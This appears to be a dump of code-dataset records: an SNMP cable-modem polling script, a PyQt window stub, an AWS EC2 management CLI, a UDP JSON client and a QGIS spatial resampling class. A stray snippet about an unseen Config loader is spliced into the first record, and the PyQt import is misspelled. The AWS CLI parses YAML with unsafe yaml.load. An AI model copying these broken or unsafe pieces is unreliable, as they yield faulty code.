return a list of MAC Addresses that are remembered. 
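A minimal round trip through the Config loader above — a sketch assuming config.py is importable as togglsync.config; the keys and URL are made up:

from togglsync.config import Config

# safe_load accepts a plain string as well as a stream
yml = """
toggl: https://example.invalid/toggl
entries:
  - label: work
    toggl_api_key: TOGGL_KEY
    redmine_api_key: REDMINE_KEY
"""
config = Config.fromYml(yml)
print(config)  # prints the toggl URL and the single entry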
May not all be registered.\noid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.20.1.3.1.2\"))\nresult=session.walk(oid)\n\n\n#maclist1 is a new vector to store the formatted mac addresses\nmaclist1=[]\n\n\n# convert mac addresses to something readable\nfor item in result:\n mac=str(netaddr.EUI(binascii.hexlify(item).decode('utf-8'), dialect=netaddr.mac_unix))\n print (mac)\n maclist1.append(mac)\n\n# create a 2D list that will be used to store the data in a .csv file\nw = 11\nh = len(result)\n\n\nmatrix = [[0 for x in range(w)] for y in range(h)]\n\n# write the mac addresses in the first column of the matrix to be used for .csv file\n\nfor i, item in enumerate(maclist1, start=0):\n matrix[i][0] = item\n\n\n\n# write the mac addresses to the local file\nf.write(\"MAC addresses from DOCS-IF3-MIB\\n\")\ns=str(maclist1)\nf.write(s)\nf.write(\"\\n\")\n\n# get modem registration status (CMTS view)\noid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.20.1.3.1.6\"))\nregstat=session.walk(oid)\n\nnumber_of_reg_modems=0\n\n# put regstat in second column of matrix used for .csv file\nfor i, item in enumerate(regstat, start=0):\n item = int(item)\n matrix[i][1] = item\n if matrix[i][1] == 8:\n number_of_reg_modems += 1\n\n# count the number of modems that are actually registered (status = 8)\n\n#print \"\\nThere are \", number_of_reg_modems, \" registered modems\\n\\n\"\nprint()\nprint(\"There are \", number_of_reg_modems, \"registered modems\")\nprint()\n\n\n\n\n\n# iplist1 is a new vector to store the formatted IP addresses\niplist1=[]\n\n#get the list of IPv4 addresses for registered modems\nIPv4oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.20.1.3.1.5\"))\nIPv4result=session.walk(IPv4oid)\n\n#print(IPv4result)\n\n\nfor i, item in enumerate(IPv4result, start=0):\n# print(item)\n v = ipaddress.ip_address(item).exploded\n # print(v)\n iplist1.append(v)\n matrix[i][2] = v\n\n#print(iplist1)\n\n\n#write IP addresses to local file\nf.write(\"IP addresses from DOCSIS-IF3-MIB\\n\")\ns=str(iplist1)\nf.write(s)\nf.write(\"\\n\")\n\n\n\n#get recieve MER from CMTS for each modem\ncmts_rx_mer_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.4.1.2\"))\ncmts_rx_mer_result=session.walk(cmts_rx_mer_oid)\n\n\nprint()\nprint(\"these are the RX MERs at CMTS\")\n\n\nfor i, item in enumerate(cmts_rx_mer_result, start = 0):\n item = int(item)/100\n matrix[i][3] = item\n print(item)\n\n\n\n\n\n\n\n\n#get CMTS downstream Tx power\ncmts_tx_power_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.22.1.3\"))\ncmts_tx_power_result=session.walk(cmts_tx_power_oid)\n\nprint(\"\\n\")\nprint(\"this is the CMTS transmit power\")\nprint(cmts_tx_power_result)\nprint(\"\\n\")\n\n\n\n\n\n# set up netsnmp session for modems\n\n\n\nprint(\"\\n\")\nprint(\"printing CM xmit power and RX mer\")\nprint(\"\\n\")\n\n\nfor item in iplist1:\n\n session=netsnmp.Session(Version=2, Community=cm_comm_string, DestHost=item, UseNumeric=1)\n cm_xmit_power_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.13.1.10\"))\n cm_xmit_power_result=session.walk(cm_xmit_power_oid)\n\n for i, item in enumerate(cm_xmit_power_result, start = 0):\n item = int(item)/10\n matrix[i][4] = item\n print(\"cm xmit power\")\n print(item)\n\n\n cm_rx_power_oid=netsnmp.VarList(netsnmp.Varbind(\".1.3.6.1.4.1.4491.2.1.28.1.11.1.3\"))\n cm_rx_power_result=session.walk(cm_rx_power_oid)\n\n for i, item in enumerate(cm_rx_power_result, start = 0):\n item = int(item)\n matrix[i][5] = item\n print(\"cm rx 
power\")\n print(item)\n\n\n\n\n\n#close that local file\nf.close()\n\n\n\n#open a new .csv file to write the matrix into, this is openable with Excel.\n\nwith open(sttime+'.csv', 'w', newline='') as f:\n writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_MINIMAL)\n for row in matrix:\n writer.writerow(row)\nf.close()\n\n\n","sub_path":"mer.py","file_name":"mer.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"550752109","text":"import sys\nfrom PyQt5.QtCore import*\nfrom PyQr5.QtWidgets import*\n\nclass MaWindow(QMainWindow):\n\n def __init__(self, parent = None):\n super(MaWindow, self).__init__(parent)\n self.show()\n\ndef main(args):\n print(\"main\")\n app = QApplication(args)\n mainw = MaWindow()\n app.exec()\n\nif __name__ == \"__main__\":\n print(\"__main__\")\n main(sys.argv)\n","sub_path":"QmainWindonw.py","file_name":"QmainWindonw.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"135486061","text":"import argparse\nimport re\nimport sys\n\nfrom collections import defaultdict\nfrom concurrent.futures import as_completed\nfrom concurrent.futures import ThreadPoolExecutor\n\nimport yaml\n\nfrom botocore.exceptions import NoCredentialsError\nfrom botocore.exceptions import NoRegionError\n\nfrom smartaws import cfg\nfrom smartaws import log\nfrom smartaws import __version__ as version\n\nfrom smartaws.ec2 import dhcp_options_set\nfrom smartaws.ec2 import internet_gateway\nfrom smartaws.ec2 import route_table\nfrom smartaws.ec2 import security_group\nfrom smartaws.ec2 import subnet\nfrom smartaws.ec2 import vpc\n\n\nlogger = log.get_logger(__name__)\n\n\n# This list defines the order in which EC2 resources are created, updated or deleted\nec2_resource_types = [\n 'dhcp_options_sets',\n 'internet_gateways',\n 'vpcs',\n 'subnets',\n 'route_tables',\n 'security_groups'\n]\n\n# This data structure is a mapping between the YAML node name for a\n# specific EC2 resource type and the corresponding implementation\nec2_resource_mapping = {\n 'dhcp_options_sets': dhcp_options_set,\n 'internet_gateways': internet_gateway,\n 'route_tables': route_table,\n 'subnets': subnet,\n 'security_groups': security_group,\n 'vpcs': vpc\n}\n\n# Parsing for the command line arguments\nparser = argparse.ArgumentParser(description='Smartaws v{}'.format(version))\nsubparsers = parser.add_subparsers(help='commands', dest='command')\n\n# Create command\ncreate_parser = subparsers.add_parser(\n 'create',\n help='Create AWS resources'\n)\n\ncreate_parser.add_argument(\n '--configuration', '-c',\n metavar='in-file',\n type=argparse.FileType('rt'),\n required=True,\n help='YAML configuration file for AWS resources'\n)\n\ncreate_parser.add_argument(\n '--filter', '-f',\n action='store',\n help='Select resources whose name match the given regular expression'\n)\n\ncreate_parser.add_argument(\n '--workers', '-w',\n action='store',\n help='Maximum number of parallel workers'\n)\n\ncreate_parser.add_argument(\n '--show-target-resources', '-s',\n default=False,\n action='store_true',\n help='Display target AWS resources without performing any operation'\n)\n\n# Update command\nupdate_parser = subparsers.add_parser(\n 'update',\n help='Update existing AWS resources'\n)\n\nupdate_parser.add_argument(\n '--configuration', '-c',\n metavar='in-file',\n type=argparse.FileType('rt'),\n required=True,\n help='YAML configuration file 
for AWS resources'\n)\n\nupdate_parser.add_argument(\n '--filter', '-f',\n action='store',\n help='Select resources whose name match the given regular expression'\n)\n\nupdate_parser.add_argument(\n '--workers', '-w',\n action='store',\n help='Maximum number of parallel workers'\n)\n\nupdate_parser.add_argument(\n '--show-target-resources', '-s',\n default=False,\n action='store_true',\n help='Display target AWS resources without performing any operation'\n)\n\n# Delete command\ndelete_parser = subparsers.add_parser(\n 'delete',\n help='Delete AWS resources'\n)\n\ndelete_parser.add_argument(\n '--configuration', '-c',\n metavar='in-file',\n type=argparse.FileType('rt'),\n required=True,\n help='YAML configuration file for AWS resources'\n)\n\ndelete_parser.add_argument(\n '--filter', '-f',\n action='store',\n help='Select resources whose name match the given regular expression'\n)\n\ndelete_parser.add_argument(\n '--workers', '-w',\n action='store',\n help='Maximum number of parallel workers'\n)\n\ndelete_parser.add_argument(\n '--show-target-resources', '-s',\n default=False,\n action='store_true',\n help='Display target AWS resources without performing any operation'\n)\n\n\ndef show_target_resources(conf, pattern):\n \"\"\"Display the configuration objects matching the given regex.\"\"\"\n\n target_resources = defaultdict(list)\n\n for resource_type in ec2_resource_types:\n for ctx in getattr(conf, resource_type):\n if pattern.match(ctx.get('name')):\n target_resources[resource_type].append(ctx.get('name'))\n\n logger.info('Resources that match the filter:')\n\n for resource_type, resources in target_resources.items():\n logger.info('%s:', resource_type)\n for resource in resources:\n logger.info(' └ %s', resource)\n\n\ndef manage_resources(conf, pattern, max_workers, action=None, resource_types=None):\n \"\"\"Create, update or delete EC2 resources.\"\"\"\n\n logger.info('Starting AWS configuration...')\n\n credentials = conf.credentials\n\n for resource_type in resource_types:\n # Get the relevant module to manage objects\n # identified by ``resource_type``\n module = ec2_resource_mapping[resource_type]\n\n # Apply the filter to configuration\n contexts = [\n ctx for ctx in getattr(conf, resource_type)\n if pattern.match(ctx.get('name'))\n ]\n\n tasks = []\n\n for ctx in contexts:\n try:\n handler = module.create_handler(ctx, credentials)\n tasks.append(getattr(handler, action))\n except NoRegionError:\n logger.error('You must specify a target AWS region.')\n sys.exit(1)\n\n # Using a ``concurrent.futures.ThreadPoolExecutor`` to\n # avoid waiting for blocking calls to the Amazon API\n with ThreadPoolExecutor(max_workers=max_workers) as executor:\n futures = [executor.submit(task) for task in tasks]\n for future in as_completed(futures):\n try:\n future.result()\n except NoCredentialsError:\n logger.error('Unable to locate AWS security credentials.')\n sys.exit(1)\n\n\ndef run():\n \"\"\"Program main entry point.\"\"\"\n\n # Workaround to display help if 'smartaws'\n # command is called without any argument\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n args = parser.parse_args()\n\n logger.info('Loading configuration from file %s.', args.configuration.name)\n\n # Load the configuration\n with args.configuration as stream:\n try:\n settings = yaml.load(stream)\n except yaml.YAMLError as exc:\n logger.error(exc)\n sys.exit(1)\n\n # Validate the configuration\n try:\n conf = cfg.BaseConfig(settings)\n except ValueError as exc:\n logger.error(exc)\n sys.exit(1)\n\n # This 
regular expression is used to target specific resources\n regex = args.filter if args.filter else '.*'\n pattern = re.compile(regex)\n\n if args.show_target_resources:\n show_target_resources(conf, pattern)\n sys.exit(0)\n\n if args.command == 'create':\n max_workers = args.workers or 4\n manage_resources(conf, pattern, max_workers,\n action='create_resource',\n resource_types=ec2_resource_types)\n\n elif args.command == 'update':\n max_workers = args.workers or 4\n manage_resources(conf, pattern, max_workers,\n action='update_resource',\n resource_types=ec2_resource_types)\n\n elif args.command == 'delete':\n max_workers = args.workers or 4\n manage_resources(conf, pattern, max_workers,\n action='delete_resource',\n resource_types=reversed(ec2_resource_types))\n","sub_path":"smartaws/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"383304593","text":"import socket\nimport json\n\nclass UDPClient():\n def __init__(self, host, port):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.host = host\n self.port = port\n \n def send(self, dat):\n js = json.dumps(dat)\n print(\"Length: %d, %s\" % (len(js), js))\n self.sock.sendto(js.encode(\"UTF-8\"), (self.host, self.port))","sub_path":"udpclient.py","file_name":"udpclient.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"163667620","text":"from .spatialHelpers import *\nfrom qgis.core import QgsField, QgsVectorLayer, QgsSpatialIndex, QgsMessageLog, QgsCoordinateReferenceSystem, QgsCoordinateTransform\nimport processing\n\nfrom qgis.PyQt.QtCore import QVariant, QSettings\ntry:\n import pandas as pd\n import numpy as np\nexcept:\n pass\nimport os\nfrom datetime import datetime as dt\nfrom .LookupLogger import LookupLogger\nfrom shutil import rmtree\n\nclass SpatialTemporalResampler:\n # Class that takes spatial data (QgsVectorLayers), associates them with a time and\n # allows them to be spatially resampled to output polygons based on attribute values\n # Also supports a single value for all space via same interface\n # Data can be queried in a tabular way via Pandas data frames\n\n def __init__(self, logger=LookupLogger()):\n '''\n :param logger: LookupLogger object (optional) to record the results of disaggregations and lookups\n '''\n self.logger = logger\n # Set up output shapefile fields\n self.templateShapefile = None\n self.templateEpsgCode = None\n self.templateIdField = None\n self.featureMapper = None # Mapping from desired feature id : actual feature ID (dict) for referencing use\n self.outputLayer = None # actual qgsVectorLayer\n # \"raw\" data fields\n self.dataLayers = None # pd.Series of resampled QgsVectorLayer objects, or single numbers, indexed by time. Wm-2\n self.attributeTables = None # pd.Series of data frames that each contain a copy of the relevant dataLayer's data. Improves performance when looking up values.\n self.attribute = None # pd.series of strings, indexed by time, that indicate which QgsVectorLayer field to use for the variable of interest\n self.areas = None # Area of each polygon to save having to do it on the fly each time\n\n def setOutputShapefile(self, shapefile, epsgCode, id_field):\n ''' Output polygons that will be produced. 
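To exercise the UDPClient above end to end, a minimal matching receiver; 127.0.0.1 and port 9000 are arbitrary illustration choices:

import json
import socket

# One-shot receiver for the JSON datagrams that UDPClient.send() emits.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 9000))
payload, addr = sock.recvfrom(65535)
print(addr, json.loads(payload.decode("UTF-8")))

# Sender side: UDPClient("127.0.0.1", 9000).send({"temp": 21.5})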
If inputs are different polygons, result will be area-weighted mean of intersected input polygon(s)\n shapefile: str OR QgsVectorLayer: The shapefile to use\n epsgCode: numeric EPSG code of shapefile coord system. This is needed to prevent popups asking the same\n id_field: The field of the shapefile that acts as a unique identifier for each feature.'''\n\n self.templateIdField = id_field\n self.templateEpsgCode = int(epsgCode)\n\n if id_field is None:\n raise ValueError('Shapefile ID field cannot be empty')\n\n if type(shapefile) is str:\n if not os.path.exists(shapefile):\n raise ValueError('Shapefile: ' + shapefile + ' does not exist')\n # Try and load a copy of the shapefile into memory. Allow explosion if fails.\n\n self.outputLayer = openShapeFileInMemory(shapefile, targetEPSG=self.templateEpsgCode, label='Template layer')\n\n if type(shapefile) is QgsVectorLayer:\n self.outputLayer = shapefile\n\n print('output layer', self.outputLayer)\n # Ensure the ID field exists\n fields = get_field_names(self.outputLayer)\n if id_field not in fields:\n raise ValueError('ID Field ' + str(id_field) + ' not present in output shapefile')\n\n # Refer to features by an ID in the shapefile attributes rather than (numeric) feature ID, if desired\n self.templateIdField = id_field\n # Create mapping from real (numeric) feature ID to desired (string) feature ID\n a = shapefile_attributes(self.outputLayer)[id_field]\n self.featureMapper = pd.Series(index = a.index, data = list(map(intOrString, a.values)))\n\n # record what was used to label features\n if self.logger is not None:\n self.logger.addEvent('Disagg', None, None, None, 'Labelling features using ' + id_field + ' for ' + str(shapefile))\n\n # Record area of each polygon and label as the user desires\n self.areas = pd.Series(feature_areas(self.outputLayer))\n self.areas.index = self.featureMapper[self.areas.index]\n\n def getOutputShapefile(self):\n return self.outputLayer\n\n def getOutputFeatureIds(self):\n return list(shapefile_attributes(self.outputLayer).keys())\n\n def dealWithSingleValue(self, value, startTime, attributeToUse):\n ''' Create a QgsVectorLayer based on self.outputLayer with field attributeToUse the same value all the way through '''\n\n if type(startTime) is not type(dt.now()):\n raise ValueError('Start time must be a DateTime object')\n\n if startTime.tzinfo is None:\n raise ValueError('Start time must have a time zone attached')\n\n try:\n value = float(value)\n except:\n raise ValueError('Value must be float() or convertible to a float()')\n #self.logger.addEvent('Disagg', None, None, None, 'Single value given for layer: Assigning this value to all features')\n\n # Create a layer with all entries set to the chosen vanlue\n nl = duplicateVectorLayer(self.outputLayer, targetEPSG=self.templateEpsgCode)\n nl = addNewField(nl, attributeToUse, initialValue=value)\n\n return self.updateLayers([attributeToUse], nl, startTime)\n\n def dealWithVectorLayer(self, shapefileInput, epsgCode, startTime, attributeToUse, weight_by, inputIdField):\n ''' Loads, resamples and populates object with an input vector layer for use when needed\n :param shapefileInput: Filename of shapefile to be (dis)aggregated\n :param epsgCode: EPSG code of vector layer\n :param startTime: datetime() object: the date of the period represented by this shapefile's data. 
Time ignored.\n :param attributeToUse: the field(s)/attribute(s) of the shapefile containing the quantity of interest (this gets disaggregated)\n :param inputIdField: the field/attribute of the input shapefile containing a unique identifier for each feature.\n :param weight_by: Field/attribute of the INPUT *AND* OUTPUT shapefile by which to weight disaggregated values.\n If field present in input shapefile, it is assumed to be the aggregated total. If not present,\n total is aggregated from the output shapefile, with consideration to intersected areas given.\n If no field specified, then intersected area used.\n :return: QgsVectorLayer that was added'''\n\n if self.outputLayer is None:\n raise Exception('Output shapefile must be set before adding any input vector layers')\n\n if type(startTime) is not type(dt.now()):\n raise ValueError('Start time must be a DateTime object')\n\n if startTime.tzinfo is None:\n raise ValueError('Start time must have a timezone attached')\n\n if type(shapefileInput) not in [str, QgsVectorLayer]:\n raise ValueError('Shapefile input (' + str(shapefileInput) + ') is not a string or QgsVectorLayer')\n\n if inputIdField is None:\n raise ValueError('ID field for input shapefile must be specified')\n\n # If shapefileInput is a QgsVectorLayer, then assume it is already in correct EPSG\n\n if type(shapefileInput) is str:\n if not os.path.exists(shapefileInput):\n raise ValueError('Shapefile (' + str(shapefileInput) + ') does not exist')\n\n # If the input layer isn't the same projection as the output layer, then produce a copy that's the right projection and use that instead\n reprojected = False\n if int(epsgCode) != self.templateEpsgCode:\n dest = reprojectVectorLayer(shapefileInput, self.templateEpsgCode)\n shapefileInput = dest\n reprojected = True\n\n # Load the layer\n try:\n vectorLayer = openShapeFileInMemory(shapefileInput, targetEPSG=self.templateEpsgCode)\n\n except Exception as e:\n raise ValueError('Could not load shapefile at ' + shapefileInput)\n\n try:\n # Try to delete tempfile but don't explode if fail as QGIS sometimes hangs onto them for slightly too long\n rmtree(os.path.dirname(dest))\n except:\n pass\n else:\n vectorLayer = shapefileInput\n\n # Resample layer\n if type(attributeToUse) is not list:\n attributeToUse = [attributeToUse]\n\n resampled = self.resampleLayer(vectorLayer, attributeToUse, weight_by, inputIdField)\n\n self.updateLayers(attributeToUse, resampled, startTime)\n vectorLayer = None # we are done with this\n return resampled\n\n def injectInput(self, shapefileInput, epsgCode, attributeToUse, startTime):\n ''' Inject a shapefile previously created by this object back in so no disaggregation has to happen\n :param shapefileInput: Filename of shapefile to be (dis)aggregated\n :param epsgCode: EPSG code of vector layer\n :param startTime: datetime() object: the date of the period represented by this shapefile's data. 
Time ignored.\n :param attributeToUse: the field(s)/attribute(s) of the shapefile containing the quantity of interest\n :return: QgsVectorLayer that was added'''\n\n if self.outputLayer is None:\n raise Exception('Output shapefile must be set before adding any input vector layers')\n\n if type(startTime) is not type(dt.now()):\n raise ValueError('Start time must be a DateTime object')\n\n if startTime.tzinfo is None:\n raise ValueError('Start time must have a timezone attached')\n\n if type(shapefileInput) not in [str, str]:\n raise ValueError('Shapefile input (' + str(shapefileInput) + ') is not a string filename')\n\n if not os.path.exists(shapefileInput):\n raise ValueError('Shapefile (' + str(shapefileInput) + ') does not exist')\n\n # Load the layer straight from disk as we won't be making any modifications to it\n try:\n vectorLayer = loadShapeFile(shapefileInput)\n except Exception as e:\n raise ValueError('Could not load shapefile at ' + shapefileInput)\n\n if type(attributeToUse) is not list:\n attributeToUse = [attributeToUse]\n\n self.updateLayers(attributeToUse, vectorLayer, startTime)\n return vectorLayer\n\n def updateLayers(self, attributeToUse, layer, startTime):\n # Places the vector layer and its attributes into pandas series\n # Extract attributes table so it doesn't have to be done later\n satts = shapefile_attributes(layer)\n # Make sure table is indexed by what the user wanted\n satts.index = list(map(intOrString, satts[self.templateIdField].loc[satts.index.tolist()]))\n\n if self.dataLayers is None:\n # Instantiate new time series of vector layers, make a copy of attributes table and record which attribute(s) are of interest\n self.dataLayers = pd.Series([layer], index=[startTime])\n self.attributeTables = pd.Series([satts.copy()], index=[startTime])\n self.attribute = pd.Series([attributeToUse], index=[startTime])\n else:\n # Append to existing time series, and ensure time series still chronological\n self.dataLayers[startTime] = layer\n self.dataLayers = self.dataLayers.sort_index()\n # Extract attributes table\n self.attributeTables[startTime] = satts.copy()\n self.attributeTables = self.attributeTables.sort_index()\n # Record attribute(s) of interest\n self.attribute[startTime] = attributeToUse\n self.attribute = self.attribute.sort_index()\n\n return layer\n\n # def getValueForFeatureId(self, attribute, featureId, layer):\n # # Returns the value of the specified <> (string) for a QgsVectorLayer <>\n # # for featureId in that layer. Any wrongness causes an exception\n # return shapefile_attributes(layer[attribute][featureId])\n\n def getTableForDate(self, requestDate):\n ''' Return pandas data frame of values for each feature ID on the requested datetime '''\n #tic = dt.now()\n if type(requestDate) is not type(dt.now()):\n raise ValueError('Request date must be DateTime object')\n\n if requestDate.tzinfo is None:\n raise ValueError('Request datetime must have a timezone attached')\n\n layer_idx = self.attributeTables.index[0] if self.attributeTables.index.asof(requestDate) is np.nan else self.attributeTables.index.asof(requestDate)\n var_idx = self.attribute.index[0] if self.attribute.index.asof(requestDate) is np.nan else self.attribute.index.asof(requestDate)\n\n tbl = self.attributeTables[layer_idx]\n attrib = self.attribute[var_idx]\n\n # self.logger.addEvent('LayerLookup', requestDate.date(), layer_idx.date(), attrib,\n # 'Looked up ' + str(attrib) + ' in vector layer attributes for ' + requestDate.strftime('%Y-%m-%d') + '. 
Gave data for ' + str(layer_idx.strftime('%Y-%m-%d')))\n # toc = dt.now()\n # print 'Time taken for spatial lookup:' + str((toc-tic).microseconds/1000) + ' sec'\n # Just return the field(s) of interest\n return tbl[attrib]\n\n def getLayerForDate(self, requestDate):\n ''' Return resampled layer or value for a given date, and the attribute of interest (tuple) '''\n if type(requestDate) is not type(dt.now()):\n raise ValueError('Request date must be DateTime object')\n\n if requestDate.tzinfo is None:\n raise ValueError('Request datetime must have a timezone attached')\n\n layer_idx = self.dataLayers.index[0] if self.dataLayers.index.asof(requestDate) is np.nan else self.dataLayers.index.asof(requestDate)\n var_idx = self.attribute.index[0] if self.attribute.index.asof(requestDate) is np.nan else self.attribute.index.asof(requestDate)\n\n layer = self.dataLayers[layer_idx]\n attrib = self.attribute[var_idx]\n if (len(attrib)==1) and (type(attrib) is list): # More than one attrib can be returned, but return singleton if it's a list of 1\n attrib = attrib[0]\n\n # Record which shapefile was provided for this date\n #self.logger.addEvent('LayerLookup', requestDate.date(), layer_idx.date(), 'Not sure of param', 'Looked up shapefile for requestdate and returned one for actualDate')\n\n if type(layer) is not type(QgsVectorLayer()):\n # This is a single value. Return a layer populated with it\n newLayer = duplicateVectorLayer(self.outputLayer, targetEPSG=self.templateEpsgCode)\n # Add a field and pre-populate it with the same value always\n newLayer = addNewField(newLayer, attrib, initialValue=layer)\n return (newLayer, attrib)\n else:\n # Return the existing resampled layer\n return (layer, attrib)\n\n def getOutputFeatureAreas(self):\n # Returns a pandas array of output feature areas in m2\n areas = pd.Series(feature_areas(self.outputLayer))\n areas.index = self.featureMapper[areas.index]\n return areas\n\n def getAreas(self):\n # Return the area of each feature in square metres\n return self.areas\n\n def resampleLayer(self, inputLayer, fieldsToSample, weight_by, inputIdField):\n ''' Disaggregates the polygon properties named in from at self.outputLayer features\n :param qgsVectorLayer with data to disaggregate:\n :param List of fields that should be downscaled spatially:\n :param Attribute of the OUTPUT shapefile by which to weight the resampled values that fall in the same input feature.\n *** value extracted from each inputLayer polygon will be multiplied by the fraction of that polygon intersected\n :param inputIdField: Field name of INPUT layer that contains unique identifiers for each entry\n :return: resampled layer\n '''\n\n # Make sure the fields to sample are actually present in the file. 
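getTableForDate and getLayerForDate above use Index.asof with a fall-back to the first entry when the request predates every layer; the same pattern in isolation (toy data — note that a DatetimeIndex reports a miss as NaT, whereas the code above compares against np.nan):

import pandas as pd

layers = pd.Series(["winter_layer", "summer_layer"],
                   index=pd.to_datetime(["2019-01-01", "2019-06-01"]))
request = pd.Timestamp("2019-03-15")
# asof returns the latest index label <= request, or NaT when request predates the series
idx = layers.index[0] if layers.index.asof(request) is pd.NaT else layers.index.asof(request)
print(layers.loc[idx])  # winter_layer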
Throw exception if not\n extantFields = get_field_names(inputLayer)\n missing = list(set(fieldsToSample).difference(extantFields))\n if len(missing) > 0:\n raise ValueError('The input shapefile %s is missing the following attributes: %s'%(str(inputLayer.dataProvider().dataSourceUri()), str(fieldsToSample)))\n\n # Create spatial index: assume input layer has more features than output\n inputIndex = QgsSpatialIndex()\n\n # Determine which input features intersect the bounding box of the output feature,\n # then do a real intersection.\n for feat in inputLayer.getFeatures():\n inputIndex.insertFeature(feat)\n\n # If the inputLayer and outputLayer spatial units are the same, then disaggregation does not need to happen.\n if sameFeatures(inputLayer, self.outputLayer):\n return inputLayer\n\n # record what was used to label features\n #if self.logger is not None:\n # self.logger.addEvent('Disagg', None, None, None, 'Resampling fields ' + str(fieldsToSample) + ', weighting by ' + str(weight_by))\n\n # Clone the output layer (populate this with [dis]aggregated data)\n newShapeFile = duplicateVectorLayer(self.outputLayer, targetEPSG=self.templateEpsgCode)\n # Keep track of which field name has which field index\n\n fieldIndices = {}\n newShapeFile.startEditing()\n existingFields = get_field_names(self.outputLayer)\n numFields = len(newShapeFile.dataProvider().fields())\n numFieldsAdded = 0\n\n for field in fieldsToSample:\n if field in existingFields:\n fieldIndices[field] = existingFields.index(field)\n else:\n newShapeFile.addAttribute(QgsField(field, QVariant.Double))\n newShapeFile.updateFields()\n fieldIndices[field] = numFields + numFieldsAdded\n numFieldsAdded += 1\n\n newShapeFile.commitChanges()\n newShapeFile.updateExtents()\n\n # Get read-across between so feature ID can be ascertained from name according to chosen ID field\n t = shapefile_attributes(newShapeFile)[self.templateIdField]\n def intorstring(x):\n try:\n return int(x)\n except:\n return str(x)\n\n readAcross = pd.Series(index=list(map(intorstring, t.values)), data=list(map(intorstring, t.index)))\n t = None\n\n # Get areas of input shapefile intersected by output shapefile, and proportions covered, and attribute vals\n intersectedAreas = intersecting_amounts(fieldsToSample, inputIndex, inputLayer, newShapeFile, inputIdField, self.templateIdField)\n\n # Work out disaggregation factor baed on area intersected\n # Use \"big\" totals of weightings if the same attribute present in the input data file\n total_weightings = {} # Assume no \"big\" totals are available\n #if type(weight_by) not in [str, unicode]:\n # raise ValueError('Weighting attribute name not a string or unicode variable')\n\n if weight_by in get_field_names(inputLayer):\n atts = shapefile_attributes(inputLayer)[weight_by]\n total_weightings = {weight_by:{idx:atts[idx] for idx in atts.index}}\n self.logger.addEvent('Disagg', None, None, None, 'Found attribute ' + str(weight_by) + ' in shapefile to be disaggregated. 
'\n 'Assuming this is the sum of '+ str(weight_by) + ' in the output features')\n else:\n # It's not in the input file: Record what happened in the log\n if weight_by is not None:\n self.logger.addEvent('Disagg', None, None, None, 'Total of Weighting Attribute ' + str(weight_by) + ' not found in original shapefile, so calculating it from the output areas')\n else:\n self.logger.addEvent('Disagg', None, None, None, 'No weighting attribute specified so disaggregated weighting by intersected feature area only')\n\n if weight_by is None:\n disagg = disaggregate_weightings(intersectedAreas, newShapeFile, weight_by, total_weightings, self.templateIdField)['_AREA_']\n else:\n disagg = disaggregate_weightings(intersectedAreas, newShapeFile, weight_by, total_weightings, self.templateIdField)[weight_by]\n\n # Select successfully identified output areas\n\n newShapeFile.selectByIds(list(readAcross[list(disagg.keys())]))\n\n selectedOutputFeatures = newShapeFile.selectedFeatures()\n newShapeFile.startEditing()\n # Apply disaggregation to features\n for outputFeat in selectedOutputFeatures: # For each output feature\n # Select the relevant features from the input layer\n area_weightings = {inputAreaId: disagg[outputFeat[self.templateIdField]][inputAreaId] for inputAreaId in list(disagg[outputFeat[self.templateIdField]].keys())}\n # Calculate area-weighted average to get a single value for each output area\n for field in fieldsToSample:\n # The values to disaggregate in all regions touching this output feature\n input_values = {inputAreaId: intersectedAreas[outputFeat[self.templateIdField]][inputAreaId][field] for inputAreaId in list(intersectedAreas[outputFeat[self.templateIdField]].keys())}\n # If an output area is influenced by multiple input areas, and a subset of these is invalid,\n # assign them zero\n for i in list(input_values.keys()):\n try:\n input_values[i] = float(input_values[i])\n except:\n input_values[i] = 0\n # Combine values in all input regions touching this output feature. If disagg_weightings missed one out it's because no intersection or NULL data.\n # Any value intersecting an output area with NULL weighting will be excluded\n outputAreasToUse = set(input_values.keys()).intersection(list(area_weightings.keys()))\n weighted_average = np.sum(np.array([input_values[in_id] * float(area_weightings[in_id]) for in_id in list(outputAreasToUse)]))\n\n newShapeFile.changeAttributeValue(outputFeat.id(), fieldIndices[field], float(weighted_average))\n\n newShapeFile.commitChanges()\n newShapeFile.selectByIds([]) # De-select all features\n return newShapeFile\n\n def addInput(self, input, startTime, attributeToUse, inputFieldId, weight_by=None, epsgCode=None):\n ''' Add a layer of data for a specific time. Must be QgsVectorLayer OR a float (represents all space), indexed by unique area ID.\n Unique area IDs must correspond to features in the spatial layer\n Parameters:\n # input: The QgsVectorLayer or float() object\n # epsgCode: Numeric EPSG code of layer (can be None)\n # startTime: The start of the period represented by this data (datetime() object)\n # attributeToUse: The attribute(s) (field(s)) to use as input data. Other fields will be ignored\n # inputFieldId: The attribute(s) (field(s)) that contains unique identifiers for each input field\n # weight_by: Attribute of the OUTPUT shapefile by which to weight the resampled values. 
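The weighted_average computation in resampleLayer above reduces, per output feature, to an area-weighted mean of the intersecting input values; stripped of the QGIS objects, the arithmetic is just (toy values):

import numpy as np

input_values = {"in_a": 10.0, "in_b": 30.0}  # attribute value of each intersecting input feature
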